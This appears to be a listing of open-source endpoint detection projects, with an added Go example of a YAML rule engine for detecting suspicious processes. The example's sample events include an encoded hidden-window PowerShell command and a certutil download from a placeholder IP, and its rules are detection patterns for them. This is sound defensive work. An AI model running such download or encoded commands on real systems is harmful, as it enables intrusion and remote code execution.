Open-source cross-platform endpoint detection engine for Windows, macOS, and Linux using ETW, ESF, eBPF, Sigma, YARA, IOCs, and ECS NDJSON alerts.
Updated Jul 4, 2026 - Rust
A complete speech segmentation system using Kaldi and x-vectors for voice activity detection (VAD) and speaker diarisation.
Step-by-step guide to deploying a Wazuh SIEM/SOC home lab using the official OVA. Covers hypervisor networking, memory optimization for low-RAM systems, dashboard access, SSL troubleshooting, and Windows endpoint agent deployment, with full screenshots.
Experimental closed-loop EDR evaluation framework: automated artifact mutation, sandboxed execution, telemetry collection, and explainable triage. Understands why detections trigger. M.Sc. Cybersecurity thesis (EPFL, 2026).
Python-based security tool for detecting suspicious processes
Graph-powered EDR agent with LLM threat analysis, real-time IOC matching, and chain-aware response actions
On a scale of one to America, this NextGen Norton Antivirus EDR just made enterprise-grade defense free. Built by a Norton, carrying forward a name rooted in cybersecurity history, reimagined for modern threats.
Lightweight endpoint detection agent in Go. Process telemetry, YAML rule engine with name/cmdline/regex matching, JSON-lines alerts.
I implemented a speech endpoint detector that figures out where words start and stop, using short-term energy and zero-crossing rate. Works on Persian and English.
Free lightweight EDR for small teams. Monitor processes, files, and network. Detect threats with YAML rules. Web dashboard included.
Deployed Sysmon on Windows 10 with a custom XML ruleset to detect process creation, living-off-the-land (LOTL) techniques, and encoded PowerShell execution, mapped to MITRE ATT&CK T1059.
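The design shared by the two YAML-rule agents listed above (process telemetry fed through a rule engine with name, command-line and regex matching, alerts written as JSON lines), exercised with an encoded-PowerShell rule of the kind the Sysmon entry targets, as an added Go example. This is not code from any of the listed projects: the rule keys (`process`, `contains`, `regex`), the event fields, the sample rules and the sample process events are all constructed for this example, and the rule reader handles only the flat YAML subset shown here rather than full YAML (a real agent would use a YAML library).

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"os"
	"regexp"
	"strings"
	"time"
)

// ProcessEvent is one process-creation record as the telemetry collector
// would hand it to the rule engine. Field names are this example's own.
type ProcessEvent struct {
	PID     int    `json:"pid"`
	PPID    int    `json:"ppid"`
	Name    string `json:"name"`
	Cmdline string `json:"cmdline"`
	User    string `json:"user"`
}

// Rule is one entry of the rule file. Match keys are optional; a rule fires
// only when every key it does set matches the event.
type Rule struct {
	Name     string
	Severity string
	ProcName string         // exact, case-insensitive match on the image name
	Contains string         // case-insensitive substring of the command line
	re       *regexp.Regexp // Go regexp applied to the command line
}

// Alert is the JSON-lines record written for every rule hit.
type Alert struct {
	Timestamp string       `json:"@timestamp"`
	Rule      string       `json:"rule"`
	Severity  string       `json:"severity"`
	Event     ProcessEvent `json:"event"`
}

// sampleRules is a constructed rule file in the flat YAML subset this example
// understands: a list of mappings whose values are plain scalars.
const sampleRules = `
- name: Encoded PowerShell
  severity: high
  process: powershell.exe
  regex: (?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}
- name: certutil download
  severity: medium
  process: certutil.exe
  contains: urlcache
- name: Hidden window
  severity: low
  regex: (?i)\s-w(indowstyle)?\s+hidden\b
`

// sampleEvents are constructed process records; the base64 blob is filler
// of the right shape, not a decoded payload.
var sampleEvents = []ProcessEvent{
	{PID: 4120, PPID: 812, Name: "powershell.exe", User: `CORP\alice`,
		Cmdline: `powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=`},
	{PID: 4188, PPID: 812, Name: "certutil.exe", User: `CORP\alice`,
		Cmdline: `certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt`},
	{PID: 4201, PPID: 812, Name: "powershell.exe", User: `CORP\alice`,
		Cmdline: `powershell.exe -NoProfile -File C:\scripts\inventory.ps1`},
}

// parseRules reads the subset above: "- key: value" starts a rule and an
// indented "key: value" adds a field. Regexes are compiled at load time so a
// bad rule is rejected before any event is processed.
func parseRules(doc string) ([]Rule, error) {
	var rules []Rule
	for _, raw := range strings.Split(doc, "\n") {
		line := strings.TrimSpace(raw)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		if strings.HasPrefix(line, "- ") {
			rules = append(rules, Rule{})
			line = strings.TrimPrefix(line, "- ")
		}
		if len(rules) == 0 {
			return nil, fmt.Errorf("field before first rule: %q", raw)
		}
		key, val, ok := strings.Cut(line, ": ")
		if !ok {
			return nil, fmt.Errorf("malformed line: %q", raw)
		}
		r := &rules[len(rules)-1]
		switch key {
		case "name":
			r.Name = val
		case "severity":
			r.Severity = val
		case "process":
			r.ProcName = val
		case "contains":
			r.Contains = val
		case "regex":
			re, err := regexp.Compile(val)
			if err != nil {
				return nil, fmt.Errorf("rule %q: %w", r.Name, err)
			}
			r.re = re
		default:
			return nil, fmt.Errorf("unknown key %q", key)
		}
	}
	return rules, nil
}

// matches reports whether every key the rule sets matches the event.
func (r *Rule) matches(ev ProcessEvent) bool {
	if r.ProcName != "" && !strings.EqualFold(r.ProcName, ev.Name) {
		return false
	}
	if r.Contains != "" && !strings.Contains(strings.ToLower(ev.Cmdline), strings.ToLower(r.Contains)) {
		return false
	}
	if r.re != nil && !r.re.MatchString(ev.Cmdline) {
		return false
	}
	return true
}

// evaluate runs every rule over every event, in order, and returns the hits.
func evaluate(rules []Rule, events []ProcessEvent, now time.Time) []Alert {
	var alerts []Alert
	ts := now.UTC().Format(time.RFC3339)
	for _, ev := range events {
		for i := range rules {
			if rules[i].matches(ev) {
				alerts = append(alerts, Alert{Timestamp: ts, Rule: rules[i].Name, Severity: rules[i].Severity, Event: ev})
			}
		}
	}
	return alerts
}

// writeJSONLines emits one JSON object per line; json.Encoder appends the
// newline, which is all a log shipper tailing the file needs.
func writeJSONLines(alerts []Alert, w io.Writer) error {
	enc := json.NewEncoder(w)
	for _, a := range alerts {
		if err := enc.Encode(a); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	rules, err := parseRules(sampleRules)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	if err := writeJSONLines(evaluate(rules, sampleEvents, time.Now()), os.Stdout); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}
```

Run as-is it prints three alert lines: the encoded-PowerShell and hidden-window rules both fire on the first event, the certutil rule on the second, and the benign script launch produces nothing. The encoded-command regex requires the base64 argument to follow the switch so that `-Exec` or `-File` do not trip it; in production the rule set would also carry the parent-process context that a single command line cannot give.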
Endpoint triage system for detecting suspicious activity using Python, MITRE ATT&CK mapping, and HTML threat reports.
Cross-platform vibe-coded (probably badly made but w.e) endpoint forensics suite. Dual SHA-256+SHA3-256 hash-chained. ML-DSA-65-signed evidence.
Collection of scripts for Fidelis CyberSecurity EDR
Linux kernel security: Rust eBPF probes, scalable telemetry (NDJSON/gRPC), MITRE ATT&CK detection-as-code, and Claude-powered SOAR triage tuned for ML workloads.